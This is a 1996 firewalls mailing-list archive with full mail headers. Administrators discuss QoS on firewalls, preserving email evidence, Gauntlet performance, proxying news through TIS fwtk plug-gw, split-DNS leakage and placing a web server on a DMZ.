Shields To: Firewalls@GreatCircle.COM Subject: Quality of Service and firewalls Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was wondering if there has been any discussion about implementing a quality of service guarantee protocol (such as RSVP) on a firewall. It seems to me that a firewall has the potential to become a bottleneck. Because of this the reservation protocol would have to run on the firewall as well, and any connection forming would have to reserve resources at the firewall. This would lead to different priorities of filtering (and perhaps proxying) which might require several passes at the packet - one first to allocate and incoming packet to a priority queue, then others to determine the fate of the packet. In addition, it might enable a "denial of quality of service" attack, in which bombarding the firewall would degrade its performance such that it could not longer provide the level of service required. Are there any vendors addressing these questions? Clay From firewalls-owner Tue Jul 9 17:34:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA27956 for firewalls-outgoing; Tue, 9 Jul 1996 17:23:04 -0700 (PDT) Received: from okjunc.junction.net (okjunc.junction.net [199.166.227.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA27949 for ; Tue, 9 Jul 1996 17:22:58 -0700 (PDT) Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by okjunc.junction.net (8.6.11/8.6.11) with SMTP id RAA25701 for ; Tue, 9 Jul 1996 17:22:53 -0700 Date: Tue, 9 Jul 1996 17:17:04 -0700 (PDT) From: Michael Dillon To: firewalls@GreatCircle.COM Subject: Re: Threats and Nasty Emails In-Reply-To: <9607091622.AA12030@su1.in.net> Message-ID: Organization: Memra Software Inc. - Internet consulting MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 9 Jul 1996, Frank Willoughby wrote: > Allegedly, the customer made threats to your organization. Proving this > in a court of law will be difficult at best. All their lawyer has to do > is mumble something about "mail spoofing" and make a feeble attempt to > explain what it is and the burden of proof will be on you to prove (to > a judge or a lay jury) that the customer did in fact send the mail. This is easier than you think. If you print out copies of all messages with full headers as well as your log files then you may find that the courts accept that as conclusive proof. There have been cases in the USA where such evidence was accepted. You should make sure to do the printouts immediately in front of witnesses and then have them notarized. These have as much legal standing as dated notes taken in your handwriting in conjunction with testimony to the effect that you saw something and then noted it on paper soon after the event took place. On the other hand if you don't do your printouts until the day before the trial, expect them to be given much less serious consideration. BTW I am not a lawyer. > If it was me, I would contact the customer and ask the customer to > explain what their problem is and promise to escalate their problem > through channels to see that it is resolved one way or another. Most people just refund the money, maybe send them some sort of gift as well. Michael Dillon ISP & Internet Consulting Memra Software Inc. Fax: +1-604-546-3049 http://www.memra.com E-mail: michael@memra.com From firewalls-owner Wed Jul 10 02:49:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14703 for firewalls-outgoing; Wed, 10 Jul 1996 02:40:17 -0700 (PDT) Received: from pinelands.oldmutual.com (pinelands.oldmutual.co.za [196.22.118.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA14696 for ; Wed, 10 Jul 1996 02:39:57 -0700 (PDT) Received: by pinelands.oldmutual.com; id AA03732; Wed, 10 Jul 96 11:35:14+020 Received: from mail(160.123.45.3) by pinelands.oldmutual.com via smap (V3.1) Received: from inv735524 ([160.123.1.81]) by internet_mail.oldmutual.com Message-Id: <31E37948.311A@oldmutual.com> Date: Wed, 10 Jul 1996 11:35:04 +0200 From: jbarnes@oldmutual.com (Jay Barnes) Organization: Old Mutual X-Mailer: Mozilla 2.0Eb1-OM (WinNT; I) Mime-Version: 1.0 To: firewalls Subject: Re: Gauntlet - How good is it? References: <9606280743.AA15395@spibm02> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rolf Weber wrote: > > > > > We run Gauntlet 3.1.1 on a TIS supplied PC. > > We have the following major problems (I'll spare you the list of > > minor troubles we are having.) > > 1) Slow HTTP access (A complicated page read on a machine inside > > the firewall can take 2-4 times longer than the same page read outside the > > firewall) > > 2) Internet Explorer 2.0, on Windows 95 can not be used to access > > most Secure HTTP sites. > > > i'm running the fwtk and don't have such problems. > did you ask TIS for patches? > are you sure the proxy makes it slow and not your net? > are you sure the proxy makes it slow and not your PC? > > another point: > even if you'd be right with your complaints, you're obiously missing > the point of firewalls. > security is the first and foremost goal. > > rolf > --We speeded up internal web serving by several 100% just by configuring the "no proxy for" element in Netscape. Jay From firewalls-owner Wed Jul 10 03:19:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA15416 for firewalls-outgoing; Wed, 10 Jul 1996 03:02:53 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA15402 for ; Wed, 10 Jul 1996 03:02:44 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id LAA04419 for ; Wed, 10 Jul 1996 11:58:08 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607101200.AA18414@pamela.sic.se> Date: Wed, 10 Jul 1996 12:00:18 +0100 From: "Stefan Berg" To: firewalls@GreatCircle.com Subject: News-proxy for TIS fwtk? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi there, do you have any information on how to set up a News proxy for the TIS firewall toolkit? /Stefan stefan@sic.se From firewalls-owner Wed Jul 10 03:34:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA17113 for firewalls-outgoing; Wed, 10 Jul 1996 03:30:45 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA17100 for ; Wed, 10 Jul 1996 03:30:36 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id MAA04520 for ; Wed, 10 Jul 1996 12:26:08 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607101228.AA19529@pamela.sic.se> Date: Wed, 10 Jul 1996 12:28:19 +0100 From: "Stefan Berg" To: firewalls@GreatCircle.com Subject: Re: Gauntlet - How good is it? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Rolf Weber wrote: > > > > > > We run Gauntlet 3.1.1 on a TIS supplied PC. > > > We have the following major problems (I'll spare you the list of > > > minor troubles we are having.) > > > 1) Slow HTTP access (A complicated page read on a > > > machine inside the firewall can take 2-4 times longer than the > > > same page read outside the firewall) > > > 2) Internet Explorer 2.0, on Windows 95 can not be used > > > to access most Secure HTTP sites. > > > > > i'm running the fwtk and don't have such problems. > > did you ask TIS for patches? > > are you sure the proxy makes it slow and not your net? > > are you sure the proxy makes it slow and not your PC? > > another point: > > even if you'd be right with your complaints, you're obiously missing > > the point of firewalls. > > security is the first and foremost goal. > > rolf > > --We speeded up internal web serving by several 100% just by > configuring the "no proxy for" element in Netscape. > > Jay > We are having the exakt same situation, and increased speed a little by adding the "No proxy for"-option. BUT even before we did so we had quite a small difference in response times and HTTP access in general compared to external sites. My suggestion is that you go through your network in detail to check your DNS configuration. Our biggest advantage was installing a switch to separate different network sections from eachother. Now THAT really gave us better internal speed :) /Stefan From firewalls-owner Wed Jul 10 03:45:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16510 for firewalls-outgoing; Wed, 10 Jul 1996 03:18:43 -0700 (PDT) Received: from mog.ucd.ie (mog.ucd.ie [193.1.143.84]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA16450 for ; Wed, 10 Jul 1996 03:18:22 -0700 (PDT) Message-Id: <199607101018.DAA16450@miles.greatcircle.com> Received: from mog.ucd.ie by mog.ucd.ie id <16488-0@mog.ucd.ie>; To: firewalls-digest@GreatCircle.COM Subject: Re: DNS leakage Cc: ShepherdR@Aforbes.co.za Date: Wed, 10 Jul 1996 11:18:30 +0100 From: Louis Twomey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, This configuration works fine for me on two Linux 1.2.13 machines running bind-4.9.3-B9. Is there perhaps some reference in your named.boot file, on your external nameserver, to your internal nameserver (e.g. a secondary entry pointing at your internal nameserver) ? The following is the configuration that I use for the site xyz.ie : Proxy server/External nameserver (IP address 1.2.3.4) : ----------------------------------------------------- named.boot : : primary xyz.ie xyz-external.hosts : resolv.conf : domain xyz.ie nameserver 192.168.1.10 Internal nameserver (IP address 192.168.1.10) : --------------------------------------------- named.boot : : primary xyz.ie xyz-internal.hosts secondary xyz.ie 1.2.3.4 xyz-external.hosts : forwarders 1.2.3.4 resolv.conf : domain xyz.ie nameserver 127.0.0.1 While on this topic, I would like to pose my own question. I have the same configuration as above running on two Dec Alpha machines (running Digitial Unix 3.2D), and both machines are running bind-4.9.3-REL. When the internal nameserver loads the data for the secondary (external) domain xyz.ie, this overwrites the data for the primary (internal) domain xyz.ie in memory, and the machine can subsequently no longer resolve queries on this primary domain. Has anyone seen, and resolved, this problem with either this platform or with this version of bind ? I have already addressed this question to the bind-users mailing list twice, but I receive mail only intermittently from this list and either no-one replied or these replies fell through the cracks (except, that is, for a few replies which questioned my sanity for wanting to implement such a named configuration). Regards, Louis Twomey, Computer Centre, University College Dublin, Ireland. > Hi, > > I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also > runs the DNS server for the "outside". On the "inside" there's an NT > machine running BIND for internal DNS. The FW is set up to to use the > inside NS for lookups and the inside NS forwards all queries to the FW > DNS server. > > Problem is this: > The last time my zone was transferred to my ISP, the INTERNAL names > suddenly appeared on the internet! Of course this wrecked e-mail and > other things as well, but how is this possible? How can the outside DNS > provide the secondary with any information regarding the inside? BTW the > inside network is not even accessible from the Internet (and thus the > secondary DNS). Any ideas? > > Rudie From firewalls-owner Wed Jul 10 04:35:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20355 for firewalls-outgoing; Wed, 10 Jul 1996 04:04:07 -0700 (PDT) Received: from stingray.ivision.co.uk (stingray.ivision.co.uk [194.154.62.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA20317 for ; Wed, 10 Jul 1996 04:03:52 -0700 (PDT) Received: from stingray.ivision.co.uk [194.154.62.8] Date: Wed, 10 Jul 1996 11:57:09 +0100 (BST) From: Neil A Carson To: Stefan Berg cc: firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? In-Reply-To: <9607101200.AA18414@pamela.sic.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Stefan Berg wrote: > Hi there, > > do you have any information on how to set up a News proxy > for the TIS firewall toolkit? I assumed with TIS that the way they "intended" to do this on the firewall itself was to use plug-gw to plug the NNTP connection through the firewall to a secure external new server. Yours Aye, Neil * Neil A Carson * Internet Vision Ltd. * E-Mail: neil@ivision.co.uk, Phone: (0171) 589 4500 From firewalls-owner Wed Jul 10 04:49:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA23208 for firewalls-outgoing; Wed, 10 Jul 1996 04:39:18 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA23177 for ; Wed, 10 Jul 1996 04:39:02 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id NAA04702 for ; Wed, 10 Jul 1996 13:34:33 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607101336.AA44474@pamela.sic.se> Date: Wed, 10 Jul 1996 13:36:44 +0100 From: "Stefan Berg" To: firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Great thanks to Shepherd Rudie and Jean-Francois Zwobada for your help. My news works just fine now :) /Stefan From firewalls-owner Wed Jul 10 05:04:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22634 for firewalls-outgoing; Wed, 10 Jul 1996 04:27:48 -0700 (PDT) Received: from scruz.net (nic.scruz.net [165.227.1.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA22624 for ; Wed, 10 Jul 1996 04:27:38 -0700 (PDT) Received: from x.pica.army.mil by scruz.net (8.7.3/1.34) Date: Wed, 10 Jul 96 07:32:31 PST From: rich Subject: Looking for "hot shot" - security consultant To: firewalls@greatcircle.com X-PRIORITY: 3 (Normal) X-Mailer: Chameleon 4.6.3, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I will make this brief - My company is looking for someone to be a senior security consultant. lots of travel, but really good money. You need to be good at Unix, security, NT, Internet, etc (if you have the experience, you will know!) You must also be a good public speaker, as many times you will be doing seminars and not just consulting. If interested, drop me email for more details. (I did not want to clutter this list too much...) Thanks, Rich Fitzgerald Berntein & Associates (408) 456-0430 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ** Remember -- Life is NOT a dress rehearsal! (nor is it a small furry animal with funny feet and floppy ears...) From firewalls-owner Wed Jul 10 05:04:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20896 for firewalls-outgoing; Wed, 10 Jul 1996 04:09:32 -0700 (PDT) Received: from igubu.saix.co.za (igubu.saix.net [196.25.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA20868 for ; Wed, 10 Jul 1996 04:09:15 -0700 (PDT) Received: from afjhb1exch1.aforbes.co.za Received: by afjhb1exch1.aforbes.co.za with Microsoft Exchange (IMC 4.0.837.3) Message-ID: From: Shepherd Rudie To: "'Stefan Berg'" Cc: "'firewalls@greatcircle.com'" Subject: RE: News-proxy for TIS fwtk? Date: Wed, 10 Jul 1996 13:08:47 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Set up a plug-gw to point to your news server and have all your newsreaders point to the firewall as the news server: netperm-table: plug-gw: port nntp *.inside.com -plug-to news.your-isp.com -port nntp Hope it helps! Rudie >---------- >From: Stefan Berg[SMTP:stefan@sic.se] >Sent: Wednesday, July 10, 1996 1:00 PM >To: firewalls@GreatCircle.com >Subject: News-proxy for TIS fwtk? > > >Hi there, > >do you have any information on how to set up a News proxy >for the TIS firewall toolkit? > >/Stefan >stefan@sic.se > > From firewalls-owner Wed Jul 10 05:19:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA25010 for firewalls-outgoing; Wed, 10 Jul 1996 05:04:58 -0700 (PDT) Received: from pink.webfactory.ie ([194.106.133.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA24986; Wed, 10 Jul 1996 05:04:37 -0700 (PDT) Received: (from root@localhost) by pink.webfactory.ie (8.7.5/8.7.3) id NAA15149; Wed, 10 Jul 1996 13:02:07 +0100 Received: from blonde.webfactory.ie(194.106.133.194) by pink.webfactory.ie via smap (V1.3) Received: by webfactory.ie (Smail3.1.29.1 #3) Received: from purple.webfactory.ie(194.106.133.195) by blonde.webfactory.ie via smap (V1.3) Date: Wed, 10 Jul 1996 13:03:14 +0100 (BST) From: simon Reply-To: simon Subject: Re: DNS leakage To: firewalls@GreatCircle.COM cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The following is the configuration that I use for the site xyz.ie : > > Proxy server/External nameserver (IP address 1.2.3.4) : > ----------------------------------------------------- > named.boot : > : > primary xyz.ie xyz-external.hosts > : > > resolv.conf : > domain xyz.ie > nameserver 192.168.1.10 > > > Internal nameserver (IP address 192.168.1.10) : > --------------------------------------------- > named.boot : > : > primary xyz.ie xyz-internal.hosts > secondary xyz.ie 1.2.3.4 xyz-external.hosts > : > forwarders 1.2.3.4 > > resolv.conf : > domain xyz.ie > nameserver 127.0.0.1 > Hi, We also have a similar setup - but with some differences: The named.boot file on the internal server should also contain a "slave" line - so that the internal server does not attempt to contact any other DNS servers, regardless of how slow the external server (1.2.3.4) may be. This situation should also be stregthened by having the relevant packet filters in place - so that the internal server should not be able to contact any servers other than the external 1.2.3.4, and so that no zone transfer can take place from the internal machine to any external hosts. The external server's resolv.conf should have a xfernets directive so that only trusted external hosts can do a zone transfer. I don't think that there is any point in having the internal act as a secondary to the external server. The internal server should have DNS entries for all the machines on the network - and the external one should have just those entries for machines that have direct (ie non-proxied) access to the internet. Hence there is no need for the internal server to act as a secondary for the external server - so the internal data would not be overwritten by the (superfluous) secondary data. > > While on this topic, I would like to pose my own question. I have the same > configuration as above running on two Dec Alpha machines (running Digitial > Unix 3.2D), and both machines are running bind-4.9.3-REL. When the > internal nameserver loads the data for the secondary (external) domain > xyz.ie, this overwrites the data for the primary (internal) domain xyz.ie in > memory, and the machine can subsequently no longer resolve queries on this > primary domain. Has anyone seen, and resolved, this problem with either > this platform or with this version of bind ? I have already addressed this > question to the bind-users mailing list twice, but I receive mail only > intermittently from this list and either no-one replied or these replies > fell through the cracks (except, that is, for a few replies which questioned > my sanity for wanting to implement such a named configuration). > > > > Hi, > > > > I run a TIS FWTK Firewall on a Linux 1.2.13 machine. This machine also > > runs the DNS server for the "outside". On the "inside" there's an NT > > machine running BIND for internal DNS. The FW is set up to to use the > > inside NS for lookups and the inside NS forwards all queries to the FW > > DNS server. > > > > Problem is this: > > The last time my zone was transferred to my ISP, the INTERNAL names > > suddenly appeared on the internet! Of course this wrecked e-mail and > > other things as well, but how is this possible? How can the outside DNS > > provide the secondary with any information regarding the inside? BTW the > > inside network is not even accessible from the Internet (and thus the > > secondary DNS). Any ideas? > > > > Rudie Cheers, Simon Walsh Webfactory Ltd. From firewalls-owner Wed Jul 10 05:24:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA20712 for firewalls-outgoing; Wed, 10 Jul 1996 04:07:27 -0700 (PDT) Received: from ns.NL.net (ns.NL.net [193.78.240.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA20688 for ; Wed, 10 Jul 1996 04:07:03 -0700 (PDT) Received: from lcnnl by ns.NL.net via EUnet Received: from ge (ge.lcn.nl [192.168.214.20]) by gate.lcn.nl (8.6.12/8.6.12) with SMTP id MAA10525 for ; Wed, 10 Jul 1996 12:34:53 +0200 Message-Id: <199607101034.MAA10525@gate.lcn.nl> Comments: Authenticated sender is From: "Ge' Weijers" Organization: LCN Planning/Scheduling BV To: Firewalls@GreatCircle.COM Date: Wed, 10 Jul 1996 12:38:20 MET Subject: Re: email bombing Reply-To: g.weijers@lcn.nl X-Mailer: Pegasus Mail for Windows (v2.30) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Tue, 09 Jul 1996 12:22:21 -0700 > From: Barbara Jaarsma > Subject: email bombing > > These people are bottom feeders and do not belong in positions of > authority. There are plenty of windows and toilets to clean, and that > is all they're fit for. People cleaning your company's windows and toilets are a definite security risk. Recruiting misfits does not seem to be the perfect strategy. Ge Ge' Weijers tel. +31-24-3812212 LCN Planning/Scheduling BV fax. +31-24-3238074 E-mail: ge@lcn.nl #include From firewalls-owner Wed Jul 10 05:34:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA26281 for firewalls-outgoing; Wed, 10 Jul 1996 05:18:33 -0700 (PDT) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA26255 for ; Wed, 10 Jul 1996 05:18:23 -0700 (PDT) Received: from pm1-16.in.net by su1.in.net with SMTP (5.65/1.2-eef) Date: Wed, 10 Jul 96 07:14:23 -0400 Message-Id: <9607101114.AA14010@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: Threats and Nasty Emails Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 03:32 PM 7/9/96 -0400, scs@lokkur.dexter.mi.us (Steve Simmons allegedly wrote: >Frank Willoughby writes: >Frank writes some good advice, and then says: > >>If the customer does not have a legitimate complaint, explain to the >>individual why the complaint is not valid. . . . > >Absolutely not. You're a sysadmin, not customer support or a service >bureau for outside things. Take the issues to your management, and >let them deal with it. You shouldn't in any way contact the customer. >-- Steve, is of course, absolutely right on this. I should have said " a customer support representative should explain..." Thanks for clarifying this point. Bset Regards, Frank Any sufficiently advanced bug is indistinguishable from a feature. -- Rich Kulawiec The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Information Security Consulting http://www.fortified.com Phone: (317) 573-0800 FAX: (317) 573-0817 Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Wed Jul 10 05:37:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA21903 for firewalls-outgoing; Wed, 10 Jul 1996 04:17:03 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA21818 for ; Wed, 10 Jul 1996 04:16:29 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id NAA02811; Wed, 10 Jul 1996 13:10:19 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31E38F8E.7766@apogee-com.fr> Date: Wed, 10 Jul 1996 13:10:06 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Stefan Berg Cc: firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? References: <9607101200.AA18414@pamela.sic.se> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just use the plug-gw as this plug-gw: port nntp InternalNewsServer -plug-to ExternalNewsServer -port nntp plug-gw: port nntp ExternalNewsServer -plug-to InternalNewsServer -port nntp This will allow both servers to initiate a connection on the port 119 restricting this connection to the other server. Make sure you have a plug-gw proxy or netacl running and listening on this port. Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Wed Jul 10 05:42:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22283 for firewalls-outgoing; Wed, 10 Jul 1996 04:21:24 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA22267 for ; Wed, 10 Jul 1996 04:21:08 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607101118.EAA03287@mail.marben.com> Subject: Re: DNS leakage To: twomey@mog.ucd.ie (Louis Twomey) Date: Wed, 10 Jul 1996 04:18:21 -0700 (PDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com> from "Louis Twomey" at Jul 10, 96 11:18:30 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Internal nameserver (IP address 192.168.1.10) : > --------------------------------------------- > named.boot : > : > primary xyz.ie xyz-internal.hosts > secondary xyz.ie 1.2.3.4 xyz-external.hosts > : > forwarders 1.2.3.4 > [...] > Unix 3.2D), and both machines are running bind-4.9.3-REL. When the internal > nameserver loads the data for the secondary (external) domain xyz.ie, this > overwrites the data for the primary (internal) domain xyz.ie in memory, and > the machine can subsequently no longer resolve queries on this primary >domain. Has anyone seen, and resolved, this problem with either this platform > or with this version of bind ? That's normal behaviour, as you shouldn't be both primary and secondary at the same time. The last declaration replaces the first declaration. Both primary and secondary seems buggy, for me. You cna't have both of them on the same NS. This is not a working solution, AFAIK ... Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA From firewalls-owner Wed Jul 10 06:04:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA27255 for firewalls-outgoing; Wed, 10 Jul 1996 05:25:46 -0700 (PDT) Received: from baldy.worldbit.com (baldy.worldbit.com [199.4.115.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA27177 for ; Wed, 10 Jul 1996 05:25:22 -0700 (PDT) Received: from localhost (blast@localhost) by baldy.worldbit.com (8.7.5/8.7.3) with SMTP id FAA09502; Wed, 10 Jul 1996 05:19:50 -0700 (PDT) Date: Wed, 10 Jul 1996 05:19:50 -0700 (PDT) From: Blast To: Louis Twomey cc: firewalls-digest@GreatCircle.COM, ShepherdR@Aforbes.co.za Subject: Re: DNS leakage In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Louis Twomey wrote: [deleted] > > Problem is this: > > The last time my zone was transferred to my ISP, the INTERNAL names > > suddenly appeared on the internet! Of course this wrecked e-mail and > > other things as well, but how is this possible? How can the outside DNS > > provide the secondary with any information regarding the inside? BTW the > > inside network is not even accessible from the Internet (and thus the > > secondary DNS). Any ideas? The there are other places worth talking about here when it comes to internal host names leaking. 1) If you run a News server, most clients, when you do a post will attach the hostname of the user. Unlike the SMTP leak, this includes all PC and Macintoshes on the inside. 2) When you send mail, of course all the evelopes, unless you re-write will contain in the 'Recieved by' the hostnames. 3) Once you have zones that are picked up by a secondary somewhere out on the net, you can consider it disclosed. WHat I mean by this is that there are many ways for someone to get hostnames from your external DNS so just consider it disclosed as most of us have. Point number 1 was all I was going to post and if anyone knows of a way for it to stop leaking, I would like to hear it. Thanks, --blast +--------------------------------------------------------------------+ \ Tim Keanini | "The limits of my language, / / aka blast | are the limits of my world." \ \ | --Ludwig Wittgenstein / \ +================================================/ |Key fingerprint = 7B 68 88 41 A8 74 AB EC F0 37 98 4C 37 F7 40 D6 | / PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html \ \ / +--------------------------------------------------------------------+ From firewalls-owner Wed Jul 10 06:22:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04368 for firewalls-outgoing; Wed, 10 Jul 1996 06:04:59 -0700 (PDT) Received: from gatekeeper.glaxo.com (gatekeeper.glaxo.com [192.58.204.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA04347 for ; Wed, 10 Jul 1996 06:04:47 -0700 (PDT) Received: by gatekeeper.glaxo.com (5.65/fma-120691); Received: from ussun2f. (ussun2f.glaxo.com) by ussun1d (5.x/) Reply-To: ggh14854@ussun2f.glaxo.com Received: (from ggh14854@localhost) by ussun2f. (8.7.5/8.7.3) id JAA00871; Wed, 10 Jul 1996 09:03:46 -0400 (EDT) Date: Wed, 10 Jul 1996 09:03:44 -0400 (EDT) From: "Gary G. Hull" To: firewalls Subject: Web Server on DMZ Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I realize this is not firewalls related but thought I might get the best answer(s) by asking this group. What would be the security implications of moving our WEB Server to the DMZ? What would be the best way to make it secure? We would like to do this for performance reasons. Would having a box dedicated to WEB traffic located on the DMZ offer added performance to our WEB traffic? Thanks in advance for your assistance, opinions and information. As a corollary to these questions, what is the real throughput one could expect from the TIS Gauntlet for Web Traffic? Again thanks. |/ ---o0o-@@-o0o--------- Gary G. Hull - Technical Consultant From firewalls-owner Wed Jul 10 06:49:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA08426 for firewalls-outgoing; Wed, 10 Jul 1996 06:32:09 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA08398 for ; Wed, 10 Jul 1996 06:32:00 -0700 (PDT) Received: from netevolve.com by relay4.UU.NET with SMTP Received: from lazar by netevolve.com 